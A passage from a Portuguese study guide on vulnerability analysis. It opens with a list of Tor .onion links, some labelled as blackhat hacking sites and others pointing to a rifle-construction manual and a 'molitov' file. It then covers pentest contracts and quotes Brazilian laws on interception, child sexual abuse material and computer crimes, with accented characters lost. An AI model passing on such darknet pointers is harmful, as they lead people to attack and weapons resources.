http://jkpos24pl2r3urlw.onion:6969/
http://6sxoyfb3h2nvok2d.onion/
http://dppmfxaacucguzpc.onion/
http://kpynyvym6xqi7wz2.onion/files.html

www.clubedohacker.com.br

61

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

http://kpynyvym6xqi7wz2.onion/links.html
http://dppmfxaacucguzpc.onion/

www.clubedohacker.com.br

62

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
http://clsvtzwzdgzkjda7.onion/
http://mlz3apezci5ya6k6.onion/
http://hmybz2aqe7whj7qr onion/wiki/Main_Page
http://sx3jvhfgzhw44p3x.onion/
http://www.jordanmaxwell.com/links. html
http://xqz3u5drneuzhaeo.onion/users/heidenwut2/books/000i.html

http://xqz3u5drneuzhaeo.onion/users/heidenwut2/games/000i.html <http://3terbsb5mmmdyhse.onion <- Blackhat Hacking


http://p2uekn2yfvlvpzbu.onion/arm/50calRifleConstructionManual.pd
f
http://xqz3u5drneuzhaeo.onion/users/penispanic/
http://ci3hn2uzjw2wby3z.onion/

www.clubedohacker.com.br

63

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
http://am4wuhz3zifexz5u.onion <- Tor Library.
http://ci3hn2uzjw2wby3z.onion
http://p2uekn2yfvlvpzbu.onion
http://ci3hn2uzjw2wby3z.onion <-Site de hospedagem na onion.

http://kpvz7ki2v5agwt35.onion
http://xqz3u5drneuzhaeo.onion
http://7ll6yck7azloqjqv.onion <-Tor Music.
http://ci3hn2uzjw2wby3z.onion <-Tor directory.
http://a5ec6f6zcxtudtch.onion <-Anonymous Email.

www.clubedohacker.com.br

64

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

http://5onwnspjvuk7cwvk.onion
http://kpynyvym6xqi7wz2.onion/links.html
http://xmh57jrzrnw6insl.onion/ <-TORCH (site de busca)
http://4eiruntyxxbgfv7o.onion/snapbbs/1acda566/threadlist.php?PHP
SESSID=65odjfpu90ktst1ttj2959hnu6
http://hmybz2aqe7whj7qr.onion
http://kpynyvym6xqi7wz2.onion/lyingninja.txt
http://kpynyvym6xqi7wz2.onion/fuksomeone.txt
http://kpynyvym6xqi7wz2.onion/success.txt
http://kpynyvym6xqi7wz2.onion/

www.clubedohacker.com.br

65

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

ttp://kpynyvym6xqi7wz2.onion/molitov.txt
http://utup22qsb6ebeejs.onion/
http://3g2upl4pq6kufc4m.onion
http://4eiruntyxxbgfv7o.onion/
http://am4wuhz3zifexz5u.onion/ - Tor Library
http://627kx22vati6uqkw.onion
http://4eiruntyxxbgfv7o.onion/
http://4eiruntyxxbgfv7o.onion/pm/ - TorPM
http://eqt5g4fuenphqinx.onion/ - Core.onion
Nesse captulo ns apresentamos a introduo e alguns termos
importantes que iro nos apoiar em direo ao nosso objetivo final que
entender o processo de analise de vulnerabilidades. Continue para o
capitulo dois onde iremos continuar nossos estudos.

www.clubedohacker.com.br

66

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Organizao de uma anlise de vulnerabilidades
Uma analise de vulnerabilidades deve ser organizada em etapas e
nenhuma delas deve ser negligenciada sob qualquer hiptese. Somente
com essa diviso pode-se manter o controle de todas as aes e chegar
aos resultados que se espera.
O contrato, parte essencial.
O contrato parte essencial para delimitar o escopo das atividades, ele
que vai definir o que pode ou no ser feitos para se encontrar as
possveis vulnerabilidades. tambm fonte de consulta em todas as
fases do processo, assim podem-se evitar enganos, m interpretaes,
uso da emoo na hora da execuo etc.
No contrato devem ser previstas clausulas que protejam tanto o cliente
no que se refere ao vazamento de informaes quanto o contratado no
que concernente ao escopo dos testes.
Para que no haja problemas nesse aspecto, deve-se sempre obervar o
disposto em Lei vigente nos pases onde ocorrero os testes.
Consideremos o exemplo de um escopo onde ser necessria a
realizao de testes em uma determinada infraestrutura de sistemas
computacionais e o esse escopo alcana as aplicaes web, mas, tais
aplicaes esto hospedadas em servidores que esto fisicamente fora do
Brasil. Nesse caso, alem do disposto na Lei brasileira deve-se observar o
disposto nas leis do pas onde se encontra fisicamente o hardware.
Considerando que esse guia deve cobrir o territrio brasileiro, e que no
caso citado devemos considerar as leis de cada pas, ento passemos a
analisar e conhecer as nossas leis, o que determinam e quais cuidados,
quais clusulas devemos incluir no contrato, qual melhor modelo de
contrato para contratado e contratante?

www.clubedohacker.com.br

67

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Essas so algumas perguntas que tentaremos responder nesse capitulo.
O que dizem as Leis?
Lei n 4.117, de 27 de agosto de 1962
Instituiu o Cdigo Brasileiro de Telecomunicaes. Houve alteraes
introduzidas pelo Decreto-Lei n 236, de 28 de fevereiro de 1967. E foi
revogada pela Lei n 9.472/96, exceto em se tratando de matria penal
no mencionada na referida Lei e aos preceitos relativos radiodifuso.
Lei n 4.117 foi primeira Lei que podemos considerar que tratou da
criao e regulamentao dos servios de telecomunicaes no Brasil,
mesmo tendo o foco nas concessionrias e seus agentes j trouxe
penalidades a quem violar a privacidade, divulgar informaes falsas e
todos os outros crimes contra a honra e a moral, crimes esses que so
cometidos a todo o momento na Internet de hoje, pois o uso da liberdade
de expresso s pode ter respaldo se observados o direito em sua
essncia. Visto que envolve pessoas e bens materiais protegidos por Lei.
A saber:
Art. 4 Para os efeitos desta lei constituem servios de
telecomunicaes a transmisso, emisso ou recepo de
smbolos, caracteres, sinais, escritos, imagens, sons ou
informaes de qualquer natureza, por fio, rdio, eletricidade,
meios ticos ou qualquer outro processo eletromagntico.
Telegrafia o processo de telecomunicao destinado
transmisso de escritos, pelo uso de um cdigo de sinais.
Telefonia o processo de telecomunicao destinado
transmisso da palavra falada ou de sons.

Art. 32: 2 Considera-se interferncia qualquer emisso,


irradiao ou induo que obstrua, total ou parcialmente, ou
interrompa repetidamente servios radioeltricos.

www.clubedohacker.com.br

68

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Das Infraes e Penalidades

Art. 52. A liberdade de radiodifuso no exclui a punio


dos que praticarem abusos no seu exerccio.

Art 53. Constitui abuso, no exerccio de liberdade da


radiodifuso, o emprego desse meio de comunicao para
a prtica de crime ou contraveno previsto na legislao
em vigor no Pas, inclusive:
* Promover campanha discriminatria de classe, cor, raa
ou religio; (Ler o Decreto-Lei n 236, de 1968)
* Ofender a moral familiar, pblica, ou os bons costumes;
(Decreto-Lei n 236, de 1968)

Lei n 7.102, de 20 de junho de 1983 (DOU de 21/06/1983)


Dispe sobre segurana para estabelecimentos financeiros, estabelece
normas para constituio e funcionamento das empresas particulares que
exploram servios de vigilncia e de transporte de valores etc.
Lei n 8.137, de 27 de dezembro de 1990 (DOU de 28/12/1990)
Definiu os crimes contra a ordem tributria, econmica e contra as
relaes de consumo etc.
Lei n 8.159, de 08 de janeiro de 1991 (DOU de 09/01/1991)
Dispe sobre a poltica nacional de arquivos pblicos e privados etc.
Lei n 8.977, de 06 de janeiro de 1995 (DOU de 09/01/1995)
Dispe sobre o Servio de TV a Cabo etc.
Lei n 9.296, de 24 de julho de 1996 (DOU de 25/07/1996)
Regulamenta o inciso XII, parte final, do art. 5 da Constituio Federal
que trata sobre o sigilo nas comunicaes telefnicas.

www.clubedohacker.com.br

69

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Presidncia da Repblica
Casa Civil Subchefia para Assuntos
Jurdicos
LEI N 9.296, DE 24 DE JULHO DE 1996.
O PRESIDENTE DA REPBLICA Fao saber que o Congresso
Nacional decreta e eu sanciono a seguinte Lei:
Art. 1 A interceptao de comunicaes telefnicas, de qualquer
natureza, para prova em investigao criminal e em instruo processual
penal, observar o disposto nesta Lei e depender de ordem do juiz
competente da ao principal, sob segredo de justia.
Pargrafo nico. O disposto nesta Lei aplica-se interceptao do
fluxo de comunicaes em sistemas de informtica e telemtica.
Art. 2 No ser admitida a interceptao de comunicaes
telefnicas quando ocorrer qualquer das seguintes hipteses:
I - No houver indcios razoveis da autoria ou participao em
infrao penal;
II - A prova puder ser feita por outros meios disponveis;
III - O fato investigado constituir infrao penal punida, no
mximo, com pena de deteno.
Pargrafo nico. Em qualquer hiptese deve ser descrita com
clareza a situao objeto da investigao, inclusive com a indicao e
qualificao dos investigados, salvo impossibilidade manifesta,
devidamente justificada.
Art. 3 A interceptao das comunicaes telefnicas poder ser
determinada pelo juiz, de ofcio ou a requerimento:
I - Da autoridade policial, na investigao criminal;
II - Do representante do Ministrio Pblico, na investigao
criminal e na instruo processual penal.

www.clubedohacker.com.br

70

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Art. 4 O pedido de interceptao de comunicao telefnica


conter a demonstrao de que a sua realizao necessria apurao
de infrao penal, com indicao dos meios a serem empregados.
1 Excepcionalmente, o juiz poder admitir que o pedido seja
formulado verbalmente, desde que estejam presentes os pressupostos
que autorizem a interceptao, caso em que a concesso ser
condicionada sua reduo a termo.
2 O juiz, no prazo mximo de vinte e quatro horas, decidir
sobre o pedido.
Art. 5 A deciso ser fundamentada, sob pena de nulidade,
indicando tambm a forma de execuo da diligncia, que no poder
exceder o prazo de quinze dias, renovvel por igual tempo uma vez
comprovada a indispensabilidade do meio de prova.
Art. 6 Deferido o pedido, a autoridade policial conduzir os
procedimentos de interceptao, dando cincia ao Ministrio Pblico,
que poder acompanhar a sua realizao.
1 No caso de a diligncia possibilitar a gravao da comunicao
interceptada, ser determinada a sua transcrio.
2 Cumprida a diligncia, a autoridade policial encaminhar o
resultado da interceptao ao juiz, acompanhado de auto
circunstanciado, que dever conter o resumo das operaes realizadas.
3 Recebidos esses elementos, o juiz determinar a providncia
do art. 8 , ciente o Ministrio Pblico.
Art. 7 Para os procedimentos de interceptao de que trata esta
Lei, a autoridade policial poder requisitar servios e tcnicos
especializados s concessionrias de servio pblico.
Art. 8 A interceptao de comunicao telefnica, de qualquer
natureza, ocorrer em autos apartados, apensados aos autos do inqurito

www.clubedohacker.com.br

71

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
policial ou do processo criminal, preservando-se o sigilo das diligncias,
gravaes e transcries respectivas.
Pargrafo nico. A apensao somente poder ser realizada
imediatamente antes do relatrio da autoridade, quando se tratar de
inqurito policial (Cdigo de Processo Penal, art.10, 1) ou na
concluso do processo ao juiz para o despacho decorrente do disposto
nos arts. 407, 502 ou 538 do Cdigo de Processo Penal.
Art. 9 A gravao que no interessar prova ser inutilizada por
deciso judicial, durante o inqurito, a instruo processual ou aps esta,
em virtude de requerimento do Ministrio Pblico ou da parte
interessada.
Pargrafo nico. O incidente de inutilizao ser assistido pelo
Ministrio Pblico, sendo facultada a presena do acusado ou de seu
representante legal.
Art. 10. Constitui crime realizar interceptao de comunicaes
telefnicas, de informtica ou telemtica, ou quebrar segredo da Justia,
sem autorizao judicial ou com objetivos no autorizados em lei.
Pena: recluso, de dois a quatro anos, e multa.
Art. 11. Esta Lei entra em vigor na data de sua publicao.
Art. 12. Revogam-se as disposies em contrrio.
Braslia, 24 de julho de 1996; 175 da Independncia e 108 da
Repblica.
FERNANDO HENRIQUE CARDOSO
Nelson A. Jobim
Em uma leitura detalhada da LEI N 9.296, DE 24 DE JULHO DE 1996
podemos observar que desde 24 de julho de 1996 j esto previsto a
utilizao dos equipamentos de informtica para auxilio nos processos
investigativos pela autoridade policial. (Pargrafo nico. O disposto
nesta Lei aplica-se interceptao do fluxo de comunicaes em
sistemas de informtica e telemtica).

www.clubedohacker.com.br

72

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Lei n 9.295, de 19 de julho de 1996 (DOU de 20/07/1996 e retificada


em 06/08/1996) Dispe sobre os servios de telecomunicaes e sua
organizao, sobre o rgo regulador etc.
Lei n 9.472, de 16 de julho de 1997 (DOU de 17/07/1997)
Dispe sobre a organizao dos servios de telecomunicaes, a criao
e o funcionamento de um rgo regulador e outros aspectos
institucionais, nos termos da Emenda Constitucional n 8, de 1995.
Lei n 9.610, de 19 de fevereiro de 1998 (DOU de 20/02/1998)
Altera, atualiza e consolida a legislao sobre direitos autorais etc.
Lei n 9.609, de 19 de fevereiro de 1998 (DOU de 20/02/1998)
Dispe sobre a proteo de propriedade intelectual de programa de
computador etc.
Lei n 9.800, de 26 de maio de 1999 (DOU de 27/05/1999)
Permite as partes a utilizao de sistema de transmisso de dados para a
prtica de atos processuais.
Lei n 9.983, de 14 de julho de 2000 (DOU de 17/07/2000)
Altera o Decreto-Lei n 2.848, de 7 de dezembro de 1940 Cdigo
Penal.
Medida Provisria n 2.200-2, de 24 de agosto de 2001 (DOU de
27/08/2001) Institui a Infraestrutura de Chaves Pblicas Brasileira
ICP-Brasil, transforma o Instituto Nacional de Tecnologia da
Informao em autarquia etc.
Lei n 10.176, de 11 de janeiro de 2001 (DOU de 12/01/2001)
Altera a Lei n 8.248, de 23 de outubro de 1991, a Lei n 8.387, de 30 de
dezembro de 1991, e o Decreto-Lei n 288, de 28 de fevereiro de 1967,

www.clubedohacker.com.br

73

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
dispondo sobre a capacitao e competitividade do setor de tecnologia
da informao.
Lei Complementar n 105, de 10 de janeiro de 2001 (DOU de
11/01/2001) Dispe sobre o sigilo das operaes de instituies
financeiras e d outras providncias.
Lei n 10.520, de 17 de julho de 2002 (DOU 18/07/2002)
Institui, no mbito da Unio, Estados, Distrito Federal e Municpios, nos
termos do art. 37, inciso XXI, da Constituio Federal, modalidade de
licitao denominada prego, para aquisio de bens e servios comuns
etc.
Lei n 10.408, de 10 de janeiro de 2002 (DOU de 11/01/2002)
Altera a Lei n 9.504, de 30 de setembro de 1997, que estabelece normas
para as eleies, para ampliar a segurana e a fiscalizao do voto
eletrnico.
Lei n 10.753, de 30 de outubro de 2003 (DOU de 31/10/2003)
Institui a Poltica Nacional do Livro
Lei n 10.740, de 01 de outubro de 2003 (DOU de 02/10/2003)
Altera a Lei n 9.504, de 30 de setembro de 1997, e a Lei n 10.408, de
10 de janeiro de 2002, para implantar o registro digital do voto.
Lei n 10.664, de 22 de abril de 2003 (DOU de 23/04/2003)
Altera as Leis nos 8.248, de 23 de outubro de 1991, 8.387, de 30 de
dezembro de 1991, e 10.176, de 11 de janeiro de 2001, dispondo sobre a
capacitao e competitividade do setor de tecnologia da informao, e
d outras providncias.
Lei n 10.077, de 30 de dezembro de 2004 (DOU de 31/12/2004)
Altera a Lei n 8.248, de 23 de outubro de 1991, a Lei n 8.387, de 30 de
dezembro de 1991, e a Lei n 10.176, de 11 de janeiro de 2001, dispondo

www.clubedohacker.com.br

74

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
sobre a capacitao e competitividade do setor de informtica e
automao.
Lei n 10.973, de 02 de dezembro de 2004 (DOU de 03/12/2004)
Dispe sobre incentivos inovao e pesquisa cientfica e tecnolgica
no ambiente produtivo.
Lei n 11.196, de 21 de novembro de 2005 (DOU de 22/11/2005)
Institui o Regime Especial de Tributao para a Plataforma de
Exportao de Servios de Tecnologia da Informao REPES, o
Regime Especial de Aquisio de Bens de Capital para Empresas
Exportadoras RECAP e o Programa de Incluso Digital; dispe sobre
incentivos fiscais para a inovao tecnolgica.
Lei n 11.111, de 05 de maio de 2005 (DOU de 06/05/2005)
Regulamenta a parte final do disposto no inciso XXXIII do caput do art.
5 da Constituio Federal.
Lei n 11.419, de 19 de dezembro de 2006 (DOU de 20/12/2006)
Dispe sobre a informatizao do processo judicial; altera a Lei n
5.869, de 11 de janeiro de 1973 Cdigo de Processo Civil.
Lei n 11.341, de 07 de agosto de 2006 (DOU de 08/08/2006).
Altera o pargrafo nico do art. 541 do Cdigo de Processo Civil Lei
no 5.869, de 11 de janeiro de 1973, para admitir as decises disponveis
em mdia eletrnica, inclusive na Internet, entre as suscetveis de prova
de divergncia jurisprudencial.
Lei n 11.280, de 16 de fevereiro de 2006 (DOU de 17/02/2006)
Altera os arts. 112, 114, 154, 219, 253, 305, 322, 338, 489 e 555 da Lei
n 5.869, de 11 de janeiro de 1973 Cdigo de Processo Civil, relativos
incompetncia relativa, meios eletrnicos, prescrio, distribuio por
dependncia, exceo de incompetncia, revelia, carta precatria e
rogatria, ao rescisria e vista dos autos; e revoga o art. 194 da Lei n

www.clubedohacker.com.br

75

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
10.406, de 10 de janeiro de 2002 Cdigo Civil.
Lei n 11.484, de 31 de maio de 2007 (DOU de 31/05/2007)
Dispe sobre os incentivos s indstrias de equipamentos para TV
Digital e de componentes eletrnicos semicondutores e sobre a proteo
propriedade intelectual das topografias de circuitos integrados,
instituindo o Programa de Apoio ao Desenvolvimento Tecnolgico da
Indstria de Semicondutores PADIS e o Programa de Apoio ao
Desenvolvimento Tecnolgico da Indstria de Equipamentos para a TV
Digital PATVD; altera a Lei n 8.666, de 21 de junho de 1993; e
revoga o art. 26 da Lei n 11.196, de 21 de novembro de 2005.
Lei n 11.829, de 25 de novembro de 2008 (DOU de 26/11/2008)
Altera a Lei n 8.069, de 13 de julho de 1990 Estatuto da Criana e do
Adolescente, para aprimorar o combate produo, venda e distribuio
de pornografia infantil, bem como criminalizar a aquisio e a posse de
tal material e outras condutas relacionadas pedofilia na internet.

Presidncia da Repblica
Casa Civil Subchefia para Assuntos Jurdicos

LEI N 11.829, DE 25 DE NOVEMBRO DE 2008.


O PRESIDENTE DA REPBLICA Fao saber que o Congresso
Nacional decreta e eu sanciono a seguinte Lei:
Art. 1o Os arts. 240 e 241 da Lei no 8.069, de 13 de julho de
1990, passam a vigorar com a seguinte redao:

www.clubedohacker.com.br

76

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Art. 240. Produzir, reproduzir, dirigir, fotografar, filmar ou
registrar, por qualquer meio, cena de sexo explcito ou pornogrfica,
envolvendo criana ou adolescente:
Pena recluso, de 4 (quatro) a 8 (oito) anos, e multa.
1o Incorre nas mesmas penas quem agencia, facilita, recruta, coage, ou
de qualquer modo intermedeia a participao de criana ou adolescente
nas cenas referidas no caput deste artigo, ou ainda quem com esses
contracena.
2o Aumenta-se a pena de 1/3 (um tero) se o agente comete o crime:
I No exerccio de cargo ou funo pblica ou a pretexto de exerc-la;
II Prevalecendo-se de relaes domsticas, de coabitao ou de
hospitalidade;
III Prevalecendo-se de relaes de parentesco consanguneo ou afim
at o terceiro grau, ou por adoo, de tutor, curador, preceptor,
empregador da vtima ou de quem, a qualquer outro ttulo, tenha
autoridade sobre ela, ou com seu consentimento. (NR)
Art. 241. Vender ou expor venda fotografia, vdeo ou outro
registro que contenha cena de sexo explcito ou pornogrfica
envolvendo criana ou adolescente:
Pena recluso, de 4 (quatro) a 8 (oito) anos, e multa. (NR)
Art. 2o A Lei no 8.069, de 13 de julho de 1990, passa a vigorar
acrescida dos seguintes arts. 241-A, 241-B, 241-C, 241-D e 241-E:
Art. 241-A. Oferecer, trocar, disponibilizar, transmitir,
distribuir, publicar ou divulgar por qualquer meio, inclusive por meio de
sistema de informtica ou telemtico, fotografia, vdeo ou outro registro
que contenha cena de sexo explcito ou pornogrfica envolvendo criana
ou adolescente: Pena recluso, de 3 (trs) a 6 (seis) anos, e multa.
1o Nas mesmas penas incorre quem:
I Assegura os meios ou servios para o armazenamento das
fotografias, cenas ou imagens de que trata o caput deste artigo;

www.clubedohacker.com.br

77

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
II Assegura, por qualquer meio, o acesso por rede de computadores s
fotografias, cenas ou imagens de que trata o caput deste artigo.
2o As condutas tipificadas nos incisos I e II do 1o deste artigo so
punveis quando o responsvel legal pela prestao do servio,
oficialmente notificado, deixa de desabilitar o acesso ao contedo ilcito
de que trata o caput deste artigo.
Art. 241-B. Adquirir, possuir ou armazenar, por qualquer meio,
fotografia, vdeo ou outra forma de registro que contenha cena de sexo
explcito ou pornogrfica envolvendo criana ou adolescente:
Pena recluso, de 1 (um) a 4 (quatro) anos, e multa.
1o A pena diminuda de 1 (um) a 2/3 (dois teros) se de pequena
quantidade o material a que se refere o caput deste artigo.
2o No h crime se a posse ou o armazenamento tem a finalidade de
comunicar s autoridades competentes a ocorrncia das condutas
descritas nos arts. 240, 241, 241-A e 241-C desta Lei, quando a
comunicao for feita por:
I Agente pblico no exerccio de suas funes;
II Membro de entidade, legalmente constituda, que inclua, entre suas
finalidades institucionais, o recebimento, o processamento e o
encaminhamento de notcia dos crimes referidos neste pargrafo;
III representante legal e funcionrios responsveis de provedor de
acesso ou servio prestado por meio de rede de computadores, at o
recebimento do material relativo notcia feita autoridade policial, ao
Ministrio Pblico ou ao Poder Judicirio.
3o As pessoas referidas no 2o deste artigo devero manter sob sigilo
o material ilcito referido.
Art. 241-C. Simular a participao de criana ou adolescente em
cena de sexo explcito ou pornogrfica por meio de adulterao,
montagem ou modificao de fotografia, vdeo ou qualquer outra forma
de representao visual:
Pena recluso, de 1 (um) a 3 (trs) anos, e multa.
Pargrafo nico. Incorre nas mesmas penas quem vende, expe
venda, disponibiliza, distribui, publica ou divulga por qualquer meio,

www.clubedohacker.com.br

78

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
adquire, possui ou armazena o material produzido na forma do caput
deste artigo.
Art. 241-D. Aliciar, assediar, instigar ou constranger, por
qualquer meio de comunicao, criana, com o fim de com ela praticar
ato libidinoso:
Pena recluso, de 1 (um) a 3 (trs) anos, e multa.
Pargrafo nico. Nas mesmas penas incorre quem:
I Facilita ou induz o acesso criana de material contendo cena de
sexo explcito ou pornogrfica com o fim de com ela praticar ato
libidinoso;
II Pratica as condutas descritas no caput deste artigo com o fim de
induzir criana a se exibir de forma pornogrfica ou sexualmente
explcita.
Art. 241-E. Para efeito dos crimes previstos nesta Lei, a
expresso cena de sexo explcito ou pornogrfica compreende
qualquer situao que envolva criana ou adolescente em atividades
sexuais explcitas, reais ou simuladas, ou exibio dos rgos genitais de
uma criana ou adolescente para fins primordialmente sexuais.
Art. 3o Esta Lei entra em vigor na data de sua publicao.
Braslia, 25 de novembro de 2008; 187o da Independncia e
120 da Repblica.
o

LUIZ INCIO LULA DA SILVA


Tarso Genro
Dilma Rousseff
Lei n 11.934, de 05 de maio de 2009 (DOU de 06/05/2009)
Dispe sobre limites exposio humana a campos eltricos,
magnticos e eletromagnticos; altera a Lei n 4.771, de 15 de setembro
de 1965.

www.clubedohacker.com.br

79

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Lei n 11.903, de 14 de janeiro de 2009 (DOU de 15/01/2009)


Dispe sobre o rastreamento da produo e do consumo de
medicamentos por meio de tecnologia de captura, armazenamento e
transmisso eletrnica de dados.
Lei n 11.900, de 08 de janeiro de 2009 (DOU de 09/01/2009)
Altera dispositivos do Decreto-Lei n 3.689, de 03 de outubro de 1941
Cdigo de Processo Penal, para prever a possibilidade de realizao de
interrogatrio e outros atos processuais por sistema de videoconferncia.
Lei n 12.249, de 11 de junho de 2010 (DOU de 14/06/2010)
Cria o Programa Um Computador por Aluno PROUCA e institui o
regime especial de aquisio de Computadores para uso educacional.
Lei n 12.270, de 24 de junho de 2010 (DOU de 25/06/2010)
Dispe sobre medidas de suspenso de concesses ou outras obrigaes
do Pas relativas aos direitos de propriedade intelectual.
Lei n 12.258, de 15 de junho de 2010 (DOU de 16/06/2010)
Altera o Decreto-Lei n 2.848, de 7 de dezembro de 1940 (Cdigo
Penal), e a Lei n 7.210, de 11 de julho de 1984 (Lei de Execuo
Penal), para prever a possibilidade de utilizao de equipamento de
vigilncia indireta pelo condenado nos casos em que especifica.
Medida Provisria n 534, de 20 de maio de 2011 (DOU de
23/05/2011) Altera o art. 28 da Lei n 11.196, de 21 de novembro de
2005, para incluir no Programa de Incluso Digital Tablet PC produzido
no Pas conforme processo produtivo bsico estabelecido pelo Poder
Executivo.
Lei n 12.485, de 12 de maio de 2011 (DOU de 13/05/2011)
Dispe sobre a comunicao audiovisual de acesso condicionado; altera
a Medida Provisria n 2.228-1, de 6 de setembro de 2001, e as Leis n

www.clubedohacker.com.br

80

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
11.437, de 28 de dezembro de 2006, 5.070, de 7 de julho de 1966, 8.977,
de 6 de janeiro de 1995, e 9.472, de 16 de julho de 1997.
Lei n 12.507, de 11 de outubro de 2011 (DOU de 13/10/2011)
Altera o art. 28 da Lei n 11.196, de 21 de novembro de 2005, para
incluir no Programa de Incluso Digital tablet PC produzido no Pas
conforme processo produtivo bsico estabelecido pelo Poder Executivo;
altera as Leis n 10.833, de 29 de dezembro de 2003, n 11.482, de 31 de
maio de 2007, n 11.508, de 20 de julho de 2007, e n 8.212, de 24 de
julho de 1991; e revoga dispositivo da Medida Provisria n 540, de 2 de
agosto de 2011.
Lei n 12.527, de 18 de novembro de 2011 (DOU de 18/11/2011
Regula o acesso a informaes previsto no inciso XXXIII do art. 5, no
inciso II do 3 do art. 37 e no 2 do art. 216 da Constituio Federal;
altera a Lei n 8.112, de 11 de dezembro de 1990; revoga a Lei n
11.111, de 5 de maio de 2005, e dispositivos da Lei n 8.159, de 8 de
janeiro de 1991; e d outras providncias.
Lei n 12.551, de 15 de dezembro de 2011 (DOU de 16/12/2011)
Altera o art. 6 da Consolidao das Leis do Trabalho (CLT), aprovada
pelo Decreto-Lei n 5.452, de 1 de maio de 1943, para equiparar os
efeitos jurdicos da subordinao exercida por meios telemticos e
informatizados exercida por meios pessoais e diretos.
Lei n 12.682, de 09 de julho de 2012 (DOU de 10/07/2012)
Dispe sobre a elaborao e o arquivamento de documentos em meio
eletromagntico.
Lei n 12.686, de 18 de julho de 2012 (DOU de 19/07/2012)
Normatiza a divulgao de documentos institucionais produzidos em
lngua estrangeira, nos stios e portais da rede mundial de computadores
internet mantidos por rgos e entidades pblicos.

www.clubedohacker.com.br

81

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Lei n 12.735, de 30 de novembro de 2012 (DOU de 03/12/2012)
Altera o Decreto-Lei n 2.848, de 7 de dezembro de 1940 Cdigo
Penal, o Decreto-Lei n 1.001, de 21 de outubro de 1969 Cdigo Penal
Militar, e a Lei n 7.716, de 5 de janeiro de 1989, para tipificar condutas
realizadas mediante uso de sistema eletrnico, digital ou similares, que
sejam praticadas contra sistemas informatizados e similares.
Lei n 12.737, de 30 de novembro de 2012 (DOU de 03/12/2012)
Dispe sobre a tipificao criminal de delitos informticos; altera o
Decreto-Lei n 2.848, de 7 de dezembro de 1940 Cdigo Penal; e d
outras providncias.

Presidncia da Repblica
Casa Civil Subchefia para Assuntos Jurdicos

LEI N 12.737, DE 30 DE NOVEMBRO DE 2012.


A PRESIDENTA DA REPBLICA Fao saber que o Congresso
Nacional decreta e eu sanciono a seguinte Lei:
Art. 1o Esta Lei dispe sobre a tipificao criminal de delitos
informticos e d outras providncias.
Art. 2o O Decreto-Lei no 2.848, de 7 de dezembro de 1940 Cdigo Penal, fica acrescido dos seguintes arts. 154-A e 154-B:
Invaso de dispositivo informtico
Art. 154-A. Invadir dispositivo informtico alheio, conectado ou
no rede de computadores, mediante violao indevida de mecanismo
de segurana e com o fim de obter, adulterar ou destruir dados ou

www.clubedohacker.com.br

82

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
informaes sem autorizao expressa ou tcita do titular do dispositivo
ou instalar vulnerabilidades para obter vantagem ilcita: Ler na integra
em http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art154a
Pena - deteno, de 3 (trs) meses a 1 (um) ano, e multa.
1o Na mesma pena incorre quem produz, oferece, distribui, vende ou
difunde dispositivo ou programa de computador com o intuito de
permitir a prtica da conduta definida no caput.
2o Aumenta-se a pena de um sexto a um tero se da invaso resulta
prejuzo econmico.
3o Se da invaso resultar a obteno de contedo de comunicaes
eletrnicas privadas, segredos comerciais ou industriais, informaes
sigilosas, assim definidas em lei, ou o controle remoto no autorizado do
dispositivo invadido:
Pena - recluso, de 6 (seis) meses a 2 (dois) anos, e multa, se a conduta
no constitui crime mais grave.
4o Na hiptese do 3o, aumenta-se a pena de um a dois teros se
houver divulgao, comercializao ou transmisso a terceiro, a
qualquer ttulo, dos dados ou informaes obtidos.
5o Aumenta-se a pena de um tero metade se o crime for praticado
contra:
I - Presidente da Repblica, governadores e prefeitos;
II - Presidente do Supremo Tribunal Federal;
III - Presidente da Cmara dos Deputados, do Senado Federal, de
Assembleia Legislativa de Estado, da Cmara Legislativa do Distrito
Federal ou de Cmara Municipal; ou
IV - dirigente mximo da administrao direta e indireta federal,
estadual, municipal ou do Distrito Federal.
Ao penal
Art. 154-B. Nos crimes definidos no art. 154-A, somente se
procede mediante representao, salvo se o crime cometido contra a
administrao pblica direta ou indireta de qualquer dos Poderes da
Unio, Estados, Distrito Federal ou Municpios ou contra empresas

www.clubedohacker.com.br

83

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
